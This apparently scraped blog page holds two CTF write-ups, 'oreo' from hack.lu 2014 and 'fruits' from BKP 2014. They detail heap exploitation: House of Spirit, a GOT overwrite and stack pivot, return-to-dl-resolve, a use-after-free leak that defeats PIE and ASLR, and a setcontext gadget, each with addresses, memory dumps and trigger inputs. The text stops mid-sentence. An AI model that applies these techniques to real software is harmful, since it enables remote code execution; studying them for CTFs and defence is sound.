<a href="https://github.com/ctfs/write-ups/tree/master/hack-lu-ctf-2014/oreo">binary</a>,
the original <a href="http://hastebin.com/kogepozuhe.py">exploit</a> I used during the ctf
and <a href="https://github.com/wapiflapi/binexpect">binexpect</a>.</p>
<p>I won’t cover the details of the fastbin exploit since that part is trivial;
reading the Malleficarum is the only thing required. I will cover the rest of my
exploit even the less interesting parts because some of them might be overkill
enough to be matter for amusement.</p>
<p>###Some stats about the problem:</p>
<ul>
<li><strong>32 bit</strong>. yes I know its 2014, tell hack.lu organizers ;-)</li>
<li><strong>CANARY, NX, ASLR, NO PIE</strong></li>
<li><strong>Unknown libc</strong>, this off course I didn’t notice until my exploit didn’t
work on the remote and I had to start over again doing things differently.</li>
<li>We have a pretty easy to use and repeatable leak primitive.</li>
</ul>
<h1 id="controlling-the-stack-twice">Controlling the stack (twice)</h1>
<p>Once the <em>House of Spirit</em> ensures us control over the next pointer to <code class="highlighter-rouge">malloc</code>,
one of the easiest ways to acquire execution control is to make it return an
address somewhere near the beginning of the GOT so you can overwrite it as per
usual.</p>
<p>From there you want to trigger your stack pivot so that you have a little more
stack space to play with.</p>
<p>There is a very nice gadget at 0x08048b42 which does <code class="highlighter-rouge">add esp, 0x1c ; pop3;
ret</code>. This does exactly what we want when called in place of <code class="highlighter-rouge">scanf</code> because it
will move the stack right into the buffer containing what we just typed at the
prompt (and we can trigger this as many times as we want.) Guess what? Yep,
didn’t see that one during the CTF. I did something <em>way</em> more complicated.</p>
<p>Here is what the GOT looked like after my overwrite:</p>
<table>
<thead>
<tr>
<th>original GOT</th>
<th>overwritten</th>
<th> </th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="highlighter-rouge">link_map</code></td>
<td>target</td>
<td>target stack</td>
</tr>
<tr>
<td><code class="highlighter-rouge">dl-resolve</code></td>
<td><code class="highlighter-rouge">0x08048ae3</code></td>
<td><code class="highlighter-rouge">pop ebp; ret;</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">printf</code></td>
<td><code class="highlighter-rouge">printf</code></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">free</code></td>
<td><code class="highlighter-rouge">0x08048450</code></td>
<td><code class="highlighter-rouge">push link_map; jmp dl-resolve</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">fgets</code></td>
<td><code class="highlighter-rouge">fgets</code></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">__stack_chk_fail</code></td>
<td><code class="highlighter-rouge">0x0804844c</code></td>
<td><code class="highlighter-rouge">leave; ret;</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">malloc</code></td>
<td><code class="highlighter-rouge">malloc</code></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">puts</code></td>
<td><code class="highlighter-rouge">puts</code></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">__gmon_start__</code></td>
<td><em>garbage</em></td>
<td>clobbered w/ final nullbyte.</td>
</tr>
<tr>
<td><code class="highlighter-rouge">strlen</code></td>
<td><em>untouched</em></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">__libc_start_main</code></td>
<td><em>untouched</em></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">__isoc99_sscanf</code></td>
<td><em>untouched</em></td>
<td> </td>
</tr>
</tbody>
</table>
<p>Notice the pointers to <code class="highlighter-rouge">link_map</code> and the <code class="highlighter-rouge">dl-resolve</code> function which aren’t
usually considered part of the GOT but are located right in front of it.</p>
<p>The way this pivot works is as follows. On the next call to <code class="highlighter-rouge">free</code>, <em>target</em>
will be pushed on the stack and instead of dl-resolve our <code class="highlighter-rouge">pop ebp; ret</code> will be
excuted and return control to the original program. After some instructions the
canary is checked relative to ebp, of course it doesn’t match anymore and we
regain control through our overwrite of <code class="highlighter-rouge">__stack_chk_fail</code>. Because now we
control ebp we simply end with a classic <code class="highlighter-rouge">leave; ret;</code> which pivots our stack.</p>
<p>We now control where the stack points to. As we will see later my final ropchain
has some data with it so I needed somewhere to store it. The only large buffer
at a known address is the one where the message is normally stored. The trouble
with this is that it is too close to the GOT and when the stack grows it ends up
overwriting important entries such as <code class="highlighter-rouge">malloc</code> which isn’t acceptable for our
exploit. So I decided to go with a small loader that I stored on the heap during
the initial preparations for the House of Spirit, I know the address of this
because it is very easy to leak.</p>
<table>
<thead>
<tr>
<th>ropchain</th>
<th> </th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="highlighter-rouge">finaltack</code></td>
<td>ebp == some location in the middle of the heap</td>
</tr>
<tr>
<td><code class="highlighter-rouge">fgets</code></td>
<td><code class="highlighter-rouge">fgets(finalstack, 1025, stdin)</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">0x0804844c</code></td>
<td><code class="highlighter-rouge">leave; ret;</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">finalstack</code></td>
<td>this is also where we write to</td>
</tr>
<tr>
<td><code class="highlighter-rouge">1025</code></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">stdin</code></td>
<td> </td>
</tr>
</tbody>
</table>
<p>After this we control the stack for real. We can simply send our ropchain and
take up as much space as we want.</p>
<h1 id="getting-a-shell">Getting a shell</h1>
<p>A lot of the work until now was getting a nice stack to play with. In the first
version of this exploit I didn’t do any of this because I thought I could just
guess which libc was running based on the addresses I leaked from the GOT and
simply return to system at some point. But, in the challenge’s author’s own
words:</p>
<blockquote>
<p>cutz: yea the libc is self compiled [and] guessing offset sucks ^^</p>
</blockquote>
<p>So. Let’s get thinking, unknown libc and ASLR. Sounds familiar? Wasn’t to me.
As it turns out there are a couple of quite simple solutions (see at the end of
this writeup). But you know, its way more fun to go with the trick that no one
is using since 2001 especially during a 48h CTF that is scheduled in the middle
of the goddamn week when I’m supposed to be working.</p>
<h2 id="return-to-dl-resolve">Return to dl-resolve</h2>
<p>After some other wild ideas that obviously didn’t work or I would be writing
about them instead, it dawned upon me that this had to be a solved problem. If
system (which is what I really wanted to call) had been used in the binary how
would its address end up in the GOT the first time it’s called anyway? Looking
this up is a matter of googling; the initial call to a library function ends up
calling <code class="highlighter-rouge">dl-resolve</code> and passing it an index into the binary’s (not library’s!)
relocation table and a pointer to something called <code class="highlighter-rouge">link_map</code>. While googling I
also noticed the Japanese
<a href="http://inaz2.hatenablog.com/entry/2014/07/27/205322">writeup</a> that mentioned
this technique so I was pretty sure this would work.</p>
<p>I guess if it simply passed the symbol’s name it would be too easy, right?
Instead it uses the relocation entry to get an index into a symbol table which
in turn yields an index in the string table which gives it the function’s
name. This name is then used to resolve the symbol in the library. How does it
get the library? Well link_map is a linked list of all loaded libraries, it
finds it in there.</p>
<p>This technique is all about calling <code class="highlighter-rouge">dl-resolve</code> with specially crafted
arguments. We give it the index into the relocation table for system and the
original value for <code class="highlighter-rouge">link_map</code>. This is all very cool, except for the fact system
isn’t in that table. If it was it would also be in the GOT/PLT and we wouldn’t
be having this whole problem in the first place. The thing is, however, that
this index doesn’t really have to fit in the table. It can be way bigger so that
the relocation entry it points to is somewhere we control.</p>
<h3 id="structure-layout">Structure layout</h3>
<pre><code class="language-C">Elf32_Rel *reloc = JMPREL + index;
Elf32_Sym *sym = &SYMTAB[ELF32_R_SYM(reloc->r_info];
name = STRTAB + sym->st_name;
</code></pre>
<p><code class="highlighter-rouge">index</code> is the argument to <code class="highlighter-rouge">dl-resolve</code> and <code class="highlighter-rouge">JMPREL</code>, <code class="highlighter-rouge">SYMTAB</code> and <code class="highlighter-rouge">STRTAB</code> are
constants because they are addresses of parts of the binary and there is no PIE.</p>
<p>We have everything we need to setup some fake structures on the heap, compute
the correct index and pass it to dl-resolve.</p>
<p>This works pretty well for the first line, but <code class="highlighter-rouge">reloc->r_info</code> is only stored
using one byte and the heap is far away from the original symtab (which is in
the binary!). This is a problem because there is no writable memory at all
within 4096 (<code class="highlighter-rouge">256 * sizeof (Elf32_Sym)</code>) bytes of the symtab.</p>
<p>The solution to this is a small detour. It turns out the symtab location isn’t
computed from scratch each time by parsing the binary, instead it is available
at a known location in the .bss. Lets quickly overwrite that using a call to
<code class="highlighter-rouge">fgets</code> and make everyone believe the symtab is on the heap!</p>
<p>Once this is done we can execute our plan using the fake structures we have
setup and <code class="highlighter-rouge">dl-resolve</code> will fetch <code class="highlighter-rouge">system</code> and return to it for us.</p>
<h2 id="alternative-do-it-yourself">Alternative: Do it yourself</h2>
<p>After doing the previous technique during the CTF I learned it isn’t that hard
to locate libc. You can simply round a known address down to a multiple of
pagesize and keep subtracting pagesizes until it starts with <code class="highlighter-rouge">\x7fELF</code>. Another
(cleaner) way is, you know, to simply loop through the <code class="highlighter-rouge">link_map</code> until you find
the library you’re looking for. That’s what the bloody thing is supposed to be
used for after all. (If you don’t know what <code class="highlighter-rouge">link_map</code> is you should have read
the previous section.)</p>
<p>Once you have the start of libc and you have something that lets you repeatedly
leak from an arbitrary address it is trivial to parse any library’s <code class="highlighter-rouge">.dynsym</code> to
retrieve whatever symbol. This technique can be seen in this
<a href="https://github.com/ctfs/write-ups/blob/master/hack-lu-ctf-2014/oreo/exploit-by-cutz.pl">exploit</a>.</p>
<p>Because those conditions are met most of the time, I think this is the reason
the previous technique is so rarely used since it requires a lot of fake
structure setup. I believe the return to <code class="highlighter-rouge">dl-resolve</code> can still be useful
sometimes because it doesn’t require any leaks per-se. In a non PIE binary it
should be possible to pull it off without leaking anything. The only time I had
to leak stuff in this exploit was because I had to corrupt the whole GOT to do
my overly-complicated pivot and still needed the original values for later.</p>wapiflapiHack.lu 2014 was really well done and entertaining. For one challenge we needed to get system from an unknown libc while bypassing ASLR. The return to dl-resolve technique I used wasn’t known to me and I will explain it in this post.Getting a shell on fruits - bkpctf 20142014-04-30T00:00:00+00:002014-04-30T00:00:00+00:00https://wapiflapi.github.io/2014/04/30/getting-a-shell-on-fruits-bkpctf-2014<p>Long time no see! I just spent two days exploiting a CTF challenge and people
want me to do a writeup so here we go. Full sploit can be found here:
<a href="http://pastebin.com/0px8FEJ7">http://pastebin.com/0px8FEJ7</a></p>
<p>The binary we will be looking at is <em>fruits</em> from Boston Key Party CTF 2014,
thanks guys! It can be found here:
<a href="http://pastebin.com/n4Z9Vw4A">pastebin.com/n4Z9Vw4A</a></p>
<blockquote>
<p>fruits: ELF 64-bit, uses shared libs, for GNU/Linux 2.6.24, stripped
Canary found NX enabled PIE enabled</p>
</blockquote>
<p>Ok, about every protection we can think of is activated but also we don’t just
want to read the key file. No, we want a shell. Why? Because of some guy named
palkeo who challenged me and will now buy me a beer some day.</p>
<h2 id="about-fruits">About fruits</h2>
<p>fruits is a server listening on 37717, it forks a process
for each client who can then order apples and pears and leave some notes. Here
is the menu we get when connecting to the server:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to our store's shopping cart!
========================================
Cart is empty.
Main Menu:
[0]: Submit Order
[1]: List Notes
[2]: Add a Note
[3]: Change a Note
[4]: Read note from file
[5]: Delete a Note
[6]: Add an Item to your Cart
[7]: Change Item Quantity
[8]: Delete Item from cart
[9]: Set favorite item
[10]: Change fav item
[11]: Print favorite item
Choose an option:
</code></pre></div></div>
<p>First lets do a quick overview of all the features:</p>
<h4 id="submit-order">Submit Order</h4>
<p>Tells us our order has been placed, doesn’t seem to actually do anything at
all.</p>
<h4 id="list-notes-add-a-note-change-a-note-read-note-from-file-delete-a-note">List Notes, Add a Note, Change a Note, Read note from file, Delete a Note</h4>
<p>Those are pretty self explanatory, we have the ability to add, change and delete
notes. We can see the notes we added with option 2. Option 3 tells us we can’t
read a note from a file because we’re not admin. Since this is a CTF exercise,
this kind of option hints to the fact that there probably is a key in some file
cleverly named <em>key</em> or <em>flag</em>. We shouldn’t focus on getting code execution too
much because bypassing this admin check is probably enough, especially since
this is 100pts.</p>
<h4 id="add-an-item-to-your-cart-change-item-quantity-delete-item-from-cart">Add an Item to your Cart, Change Item Quantity, Delete Item from cart</h4>
<p>This second set of features allows us to do the shopping. There are two kind of
objects we can buy, apples and pears. Each time we add an <em>item</em> to our cart it
adds an entry to the cart. When we change the quantity of an item it changes the
quantity for that entry, not the total amount of apples or pears we have in our
cart. We can have: 1 apple + 2 pears + 3 apples + 4 pears, this would be four
items.</p>
<h4 id="set-favorite-item-change-fav-item-print-favorite-item">Set favorite item, Change fav item, Print favorite item</h4>
<p>This is <strong>not</strong> self explanatory! First, remember an item is an entry in the
cart, not apples or pears. But the most counter-intuitive (to me at least) is
the fact that option 10, <em>Change fav item</em>, doesn’t change which entry is your
favorite item but instead it <strong>changes the item itself</strong> to become apples or
pears according to what you select. The last option prints the type of our
favorite item.</p>
<h1 id="solving-the-ctf-task">Solving the CTF Task</h1>
<p>After some testing we quickly find a vulnerability. If the favorite item is
deleted a use after free seems to be triggered when we try to print the
favorite item because the server crashes.</p>
<p>Crashing is definitively not what we want so lets not print our favorite item
just yet. Instead lets see if we can play with that memory somehow before it
crashes.</p>
<p>There seem to be two kind of objects in this program, items and notes. If we
add a new item it will probably end up in the spot of the old one. The problem
is from the server’s point of view everything will be normal again because the
favorite item is indeed an item. Lets play with the notes instead. In order to
use the freed memory it should be about the size of an item, this can be
reversed engineered or simply guessed using trial and error.</p>
<p>Lets assume our new note took the place of the deleted item, now what? We just
filled that memory with “a”s and printing the favorite items still crashes
(why wouldn’t it?).</p>
<h2 id="defeating-pie">Defeating PIE</h2>
<p>Since we have full ASLR & PIE, our priority should be leaking some stuff to get
an idea of what is going on. We have this note filled with “a”s that’s at the
same time our favorite item. How could we convince the server to write some
address to it? The only actions that change items are changing its quantity or
changing its type (which is possible since its our favorite.)</p>
<p>Lets try the later, those are the actions we take:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[6]: Add an Item to your Cart
[9]: Set favorite item
[8]: Delete Item from cart // Now the favorite item is freed.
[2]: Add a Note // The note uses the freed memory.
[10]: Change fav item // This writes to our note :-)
[1]: List Notes
</code></pre></div></div>
<p>Or <code class="highlighter-rouge">6 0 9 0 8 0 2 aaaaaaaaaaaaaaaa 10 0 1</code> for short, this is what I get:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Notes (1):
#0: Pé"^
</code></pre></div></div>
<p>Looks like a leak to me. We just need to figure out what exactly is leaked.
For this we have two options. a) We can disassemble the binary and check what
exactly is touched when we change an item’s type. b) We can take the address
and check what it points to at runtime in gdb.</p>
<p>Under gdb the leaked address I get is 0x0000555555757d90.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0000| 0x555555757d90 --> 0x555555556400 (lea rax,[rip+0x133])
</code></pre></div></div>
<p>Apparently that’s the address of a function pointer. This address points
somewhere in the program which means we just defeated PIE. On linux ASLR
randomizes mmap’s base address, but doesn’t re-randomize between each subsequent
call to it. That means in theory leaking the address of the binary is enough to
compute the addresses for the heap & libc. But I didn’t know that three days ago
and it doesn’t work very well on this binary anyway, so lets not assume this.</p>
<h2 id="reading-a-file">Reading a file</h2>
<p>Changing the favorite item’s type restored a pointer. Lets check if that fixed
the crash when we print it.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Choose an option:11
Your favorite item is a Pear
</code></pre></div></div>
<p>It does! That means this pointer is used, if we can set the pointer to the
address of something useful then we’re done. We still haven’t done a lot of
reversing or studied how the memory is handled, but we need to be able to set
that pointer to what we want. The first thing that comes to mind is simply
changing the note to something else and checking if printing the favorite item
starts crashing again. If it does then we are able to write back to the pointer
after it has leaked by modifying the note. (We could also start all over again
because this is a forking server and the addresses should always be the same,
but that’s no fun!) Remember the goal is probably to read a file, so lets take
a look at the code for Read note from file. The main loop of the binary looks
like this:</p>
<p><a href="http://2.bp.blogspot.com/-IXPf9bbHKxQ/U2BbctvgD5I/AAAAAAAAAFs/hw660q-bS1U/s1600/snapshot.png"><img src="http://2.bp.blogspot.com/-IXPf9bbHKxQ/U2BbctvgD5I/AAAAAAAAAFs/hw660q-bS1U/s1600/snapshot.png" alt="" /></a></p>
<p>If we use option 4 a check is performed before calling the function from an
array of function pointers. Function pointers? Cool that’s exactly what we need:
The known address of the address of a piece of code. We need the offset between
the leaked pointer and the address of the function pointer for option 4.</p>
<p>According to IDA, the array of function pointers (rbx in the above diagram), is
at <code class="highlighter-rouge">off_203CA0</code>, which means the fourth pointer is at <code class="highlighter-rouge">off_203CC0</code>. Under gdb
the leaked address was <code class="highlighter-rouge">0x0000555555757d90</code> and the program is mapped at
<code class="highlighter-rouge">0x0000555555554000</code>.</p>
<p>0x0000555555554000 + 0x203CC0 - 0x0000555555757d90 = <strong>-0xd0</strong></p>
<p>Anyway, long story short: That works.</p>
<h1 id="now-how-do-we-pop-a-shell">Now how do we pop a shell?</h1>
<h2 id="recon">Recon</h2>
<p>Now we have a basic understanding of the vulnerability, that’s enough to
ret2text and trigger the read file. But if we are going to pop a shell we’ll
need more than that. Lets start by examining where exactly the pointer we
control is used. So far we know its a pointer to a function that is called,
but that’s all we know.</p>
<p><a href="http://2.bp.blogspot.com/-I2pcaL8t0d0/U2EFQTipRtI/AAAAAAAAAGQ/EClJNREGMiA/s1600/snapshot.png"><img src="http://2.bp.blogspot.com/-I2pcaL8t0d0/U2EFQTipRtI/AAAAAAAAAGQ/EClJNREGMiA/s1600/snapshot.png" alt="" /></a></p>
<p>Since the crashes where caused when triggering the print favorite item option,
that’s a good place to start looking. We can see a pointer to the favorite item
was stored and is now loaded into rdi. The first 8 bytes of an item seem to
contain the address of a function that returns its name, “apple” or “pear”.
That’s consistent with what we experienced when blindly setting a function
pointer and hopping it would be called during the CTF. <code class="highlighter-rouge">print_fav</code> doesn’t touch
any registers except for <code class="highlighter-rouge">rdi</code> and <code class="highlighter-rouge">rax</code>, maybe <code class="highlighter-rouge">rsi</code> or others contain
something useful. The following is a dump of what we get when setting
<code class="highlighter-rouge">"BBBBBBBB"</code> as the first bytes of our note/favorite item. We get a crash when
we attempt to <code class="highlighter-rouge">call [rax]</code>.</p>
<p><a href="http://1.bp.blogspot.com/-FHrjp9iq5B0/U2EOg5zPtGI/AAAAAAAAAG8/SZKu31yfXWM/s1600/snapshot.png"><img src="http://1.bp.blogspot.com/-FHrjp9iq5B0/U2EOg5zPtGI/AAAAAAAAAG8/SZKu31yfXWM/s1600/snapshot.png" alt="" /></a></p>
<p><a href="http://4.bp.blogspot.com/-C1Js1Y_8uDw/U2EOqkbklFI/AAAAAAAAAHE/avyxI59xavY/s1600/snapshot.png"><img src="http://4.bp.blogspot.com/-C1Js1Y_8uDw/U2EOqkbklFI/AAAAAAAAAHE/avyxI59xavY/s1600/snapshot.png" alt="" /></a></p>
<p>As expected, <code class="highlighter-rouge">rdi</code> points to the favorite item and <code class="highlighter-rouge">rax</code> contains the address
loaded from the beginning of the item during the previous instruction. The other
registers couldn’t be less helpful. <code class="highlighter-rouge">rsi</code>, <code class="highlighter-rouge">rdx</code> and <code class="highlighter-rouge">rcx</code> which are the other
arguments to the call contain garbage that we can’t control, and the other
registers have some pointers to code. What about the stack?</p>
<p><a href="http://2.bp.blogspot.com/-qGgR7jTdS3k/U2EOTHnmFiI/AAAAAAAAAG0/IYntKU76GZk/s1600/snapshot.png"><img src="http://2.bp.blogspot.com/-qGgR7jTdS3k/U2EOTHnmFiI/AAAAAAAAAG0/IYntKU76GZk/s1600/snapshot.png" alt="" /></a></p>
<p>Wow that’s empty. <code class="highlighter-rouge">0x555555556375</code> is the return address into the main loop we
saw earlier, and then we already have main’s stack frame. Nothing we control at
all. Bad luck.</p>
<h2 id="ok-what-do-we-have">OK, what do we have?</h2>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x555555555960: mov rax,QWORD PTR [rdi]
0x555555555963: call QWORD PTR [rax]
</code></pre></div></div>
<p>The <em>only</em> thing we control is the memory <code class="highlighter-rouge">rdi</code> points to, we control that on
63 bytes given we don’t use null-bytes or new-lines otherwise it will be cut.
We do not have any other registers or the stack to work with. On the plus
side: we did leak an address and bypass PIE.</p>
<p>What can we do with this? Not much, the only thing we can do is call code
pointed to by an address stored at a know location in memory, that is to say
in the binary itself. Think function pointers, vtables, GOT, etc…
Can we have a list? Of course. Here you go:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x555555758010 --> 0x7ffff7df04e0 (sub rsp,0x38)
0x555555758018 --> 0x7ffff7a97c30 (<free>)
0x555555758020 --> 0x7ffff7b104e0 (<setsockopt>)
0x555555758028 --> 0x5555555551d6 (<inet_ntoa@plt+6>)
0x555555758030 --> 0x5555555551e6 (<fclose@plt+6>)
0x555555758038 --> 0x5555555551f6 (<__stack_chk_fail@plt+6>)
0x555555758040 --> 0x7ffff7a9bc90 (movd xmm1,esi)
0x555555758048 --> 0x7ffff7a86940 (<getc>)
0x555555758050 --> 0x7ffff7b00de0 (<close>)
0x555555758058 --> 0x7ffff7a86350 (<fputc>)
0x555555758060 --> 0x7ffff7a35dd0 (<__libc_start_main>)
0x555555758068 --> 0x555555555256 (<fgets@plt+6>)
0x555555758070 --> 0x555555555266 (<feof@plt+6>)
0x555555758078 --> 0x555555555276 (<__gmon_start__@plt+6>)
0x555555758080 --> 0x7ffff7a97590 (<malloc>)
0x555555758088 --> 0x7ffff7a82d20 (<fflush>)
0x555555758090 --> 0x7ffff7b101d0 (<listen>)
0x555555758098 --> 0x7ffff7a71a80 (<sscanf>)
0x5555557580a0 --> 0x7ffff7a97d30 (<realloc>)
0x5555557580a8 --> 0x7ffff7a82a70 (<fdopen>)
0x5555557580b0 --> 0x5555555552e6 (<__printf_chk@plt+6>)
0x5555557580b8 --> 0x7ffff7b100b0 (<bind>)
0x5555557580c0 --> 0x555555555306 (<memmove@plt+6>)
0x5555557580c8 --> 0x555555555316 (<fopen@plt+6>)
0x5555557580d0 --> 0x7ffff7b10050 (<accept>)
0x5555557580d8 --> 0x555555555336 (<exit@plt+6>)
0x5555557580e0 --> 0x7ffff7a83bc0 (<fwrite>)
0x5555557580e8 --> 0x7ffff7b1e300 (<__fprintf_chk>)
0x5555557580f0 --> 0x7ffff7a9d660 (<strdup>)
0x5555557580f8 --> 0x555555555376 (<__cxa_finalize@plt+6>)
0x555555758100 --> 0x7ffff7ad5db0 (<fork>)
0x555555758108 --> 0x7ffff7b10540 (<socket>)
</code></pre></div></div>
<p>There are also a bunch of pointers to code contained in the binary (other than
the PLT included in the list above) but the binary doesn’t contain anything
obviously useful to us so I didn’t include those.</p>
<p>That’s everything we have. Now we need to start thinking about what we can do
with this.</p>
<h2 id="expanding">Expanding</h2>
<p>None of the functions above will spawn us a shell, especially since we only
control the first argument, and in a very limited way: The first argument points
to memory starting with the address of the code being called, that will very
likely mess things up. Even if we had a known pointer to <code class="highlighter-rouge">system</code> the null bytes
in the address would cut the command before anything useful. As none of the
above functions work out of the box we’ll need to find a way to call something
else. To do this we’ll have to put a pointer to what we want at a known location
in memory. The only place where we can reasonably write is on the heap, using
notes. For our note on the heap to be a known address we’dd have to leak it
first. That’s our first goal.</p>
<h3 id="leaking-a-heap-address">Leaking a heap address</h3>
<p>Lets look at our list of callable functions again. Given the first argument is a
pointer to our note, how can we leak the heap? We’re lucky this time. The first
function gives us a solution: <code class="highlighter-rouge">free</code>. If we call <code class="highlighter-rouge">free</code> libc’s malloc will
reclaim the space used by the note and write some pointers to it for
bookkeeping. Because the program doesn’t know we freed the note behind its back
we’ll still be able to list the notes and leak the pointer. You might want to
add a second note after this, then you’ll have note0 and note1 using the same
memory, the memory that’s also used by the favorite item. If you don’t do this
the next allocation from libc or whatever will mess with you.</p>
<h3 id="getting-libc">Getting libc</h3>
<p>OK, we’re now able to call any address we want using a trampoline because we can
compute the heap addresses of our notes. There isn’t a silly call to random
anywhere in dlmalloc’s implementation. But that still limits us to calling code
contained in the binary and their aren’t a lot of useful gadgets to ROP with.
There is a nice trick here, remember the way to solve the challenge by simply
reading the flag.txt file? Well we can do the same with <code class="highlighter-rouge">/proc/self/maps</code>, a
note is limited to 63 characters, but luckily libc will always be the first
mapping, except under gdb. We leaked addresses for the heap and libc, we’re
making progress: <strong>ASLR is defeated</strong>. (Actually not quite, because we still
don’t know the stack, but whatever!) We can call any piece of code we want
now. But still, we don’t control the registers as much as we’d like.</p>
<h2 id="control">Control</h2>
<p>Now that we have knowledge of where the heap and libc are located in memory it
is time to start thinking about an actual exploit. We can call any piece of code
we want and we control parts of the memory pointed to by rdi. What can we call?
Well that’s a good question, I spent hours on this trying to find a good
gadget. After a while I stumbled upon some code from setcontext. I you don’t
know what setcontext is then go read the man page, <strong>now</strong>. This gadget is
pretty amazing:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code><setcontext+53>: mov rsp, QWORD PTR [rdi+0xa0]
<setcontext+60>: mov rbx, QWORD PTR [rdi+0x80]
<setcontext+67>: mov rbp, QWORD PTR [rdi+0x78]
<setcontext+71>: mov r12, QWORD PTR [rdi+0x48]
<setcontext+75>: mov r13, QWORD PTR [rdi+0x50]
<setcontext+79>: mov r14, QWORD PTR [rdi+0x58]
<setcontext+83>: mov r15, QWORD PTR [rdi+0x60]
<setcontext+87>: mov rcx, QWORD PTR [rdi+0xa8]
<setcontext+94>: push rcx
<setcontext+95>; mov rsi, QWORD PTR [rdi+0x70]
<setcontext+99>; mov rdx, QWORD PTR [rdi+0x88]
<setcontext+106>: mov rcx, QWORD PTR [rdi+0x98]
<setcontext+113>: mov r8, QWORD PTR [rdi+0x28]
<setcontext+117>: mov r9, QWORD PTR [rdi+0x30]
<setcontext+121>: mov rdi, QWORD PTR [rdi+0x68]
<setcontext+125>: xor eax, eax
<setcontext+127>: ret
</code></pre></div></div>
<p>All registers, including <code class="highlighter-rouge">rsp</code> and <code class="highlighter-rouge">rbp</code>, are loaded from the memory pointed to
by <code class="highlighter-rouge">rdi</code> and we control where we ret to.</p>
<p>The problem is the offsets, they are pretty large, and we only control 63 bytes
through our notes. We’ll have to setup the heap in such a way that we have the
values we want where we want them. There might be a correct way to do this, I
don’t know. The way I did it is simple: I just played around with different
allocation patterns until I found something that seemed to work OK.</p>
<p>I started by doing a simple loop. Adding some notes so that I could see what a
heap looked like. This is what I got, dumping from rdi, our favorite note:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0000| 0x555555759490 --> 0x555555757cc0 --> 0x555555555a90 (push rbx)
0008| 0x555555759498 ('o' <repeats 15 times>)
0016| 0x5555557594a0 --> 0x6f6f6f6f6f6f6f ('ooooooo')
0024| 0x5555557594a8 --> 0x21 ('!')
0032| 0x5555557594b0 ("11111111")
0040| 0x5555557594b8 --> 0x555555759400 --> 0x0
0048| 0x5555557594c0 --> 0x555555759520 ("00000000")
0056| 0x5555557594c8 --> 0x51 ('Q')
0064| 0x5555557594d0 --> 0x0
0072| 0x5555557594d8 --> 0x555555759490 --> 0x555555757cc0 --> 0x555555555a90 (push rbx)
0080| 0x5555557594e0 --> 0x555555759520 ("00000000")
0088| 0x5555557594e8 --> 0x5555557594b0 ("11111111")
0096| 0x5555557594f0 --> 0x555555759570 ("22222222")
0104| 0x5555557594f8 --> 0x5555557595d0 ("33333333")
0112| 0x555555759500 --> 0x5555557595f0 ("44444444")
0120| 0x555555759508 --> 0x555555759610 ("55555555")
0128| 0x555555759510 --> 0x555555759630 ("66666666")
0136| 0x555555759518 --> 0x21 ('!')
0144| 0x555555759520 ("00000000")
0152| 0x555555759528 --> 0x0
0160| 0x555555759530 --> 0x0
0168| 0x555555759538 --> 0x31 ('1')
0176| 0x555555759540 --> 0x0
0184| 0x555555759548 --> 0x555555759490 --> 0x555555757cc0 --> 0x555555555a90 (push rbx)
0192| 0x555555759550 --> 0x555555759520 ("00000000")
0200| 0x555555759558 --> 0x5555557594b0 ("11111111")
0208| 0x555555759560 --> 0x555555759570 ("22222222")
0216| 0x555555759568 --> 0x21 ('!')
0224| 0x555555759570 ("22222222")
0232| 0x555555759578 --> 0x555555759500 --> 0x5555557595f0 ("44444444")
0240| 0x555555759580 --> 0xffffffffffffffff
0248| 0x555555759588 --> 0x41 ('A')
0256| 0x555555759590 --> 0x0
0264| 0x555555759598 --> 0x555555759490 --> 0x555555757cc0 --> 0x555555555a90 (push rbx)
0272| 0x5555557595a0 --> 0x555555759520 ("00000000")
0280| 0x5555557595a8 --> 0x5555557594b0 ("11111111")
0288| 0x5555557595b0 --> 0x555555759570 ("22222222")
0296| 0x5555557595b8 --> 0x5555557595d0 ("33333333")
0304| 0x5555557595c0 --> 0x5555557595f0 ("44444444")
0312| 0x5555557595c8 --> 0x21 ('!')
0320| 0x5555557595d0 ("33333333")
</code></pre></div></div>
<p>That’s a lot of copy/pasta, but its necessary to show you the patterns. For
this test I added 8 notes: <code class="highlighter-rouge">"00000000"</code> to <code class="highlighter-rouge">"77777777"</code>, so not everything is
included in this dump obviously. There are two things to note in this dump,
first we have the raw notes at offsets 0, 32, 144, 224 and 320. The other thing
we have are the lists of pointers to our notes at offsets 72, 184 and</p>
<ol>
<li>If you look carefully you’ll see it always start with our note0 (the one
that we use to trigger use after frees) and then continues sequentially with the
other notes we add. However they don’t all stop with the same note. This “list”
is actually an array that the program uses to keep track of all the notes. It is
reallocated every time a note is added or delete, that’s why its at several
places.</li>
</ol>
<p>Now, what we need before jumping into setcontext is a little bit different. If
you look back at the way the registers are loaded we notice we can jump after
the moment <code class="highlighter-rouge">rsp</code> is loaded and avoid changing our stack if we want to. The one
location we MUST control is <code class="highlighter-rouge">rdi + 0xa8</code> because that contains the address we will
<code class="highlighter-rouge">ret</code> to.</p>
<p>Basically we have two options. We can control <code class="highlighter-rouge">rsp</code> and <code class="highlighter-rouge">ret</code>’s target and do a
ropchain. But that’s pretty hard to pull off because those two are loaded from
consecutive addresses. Due to the null bytes we can’t simply write both of them
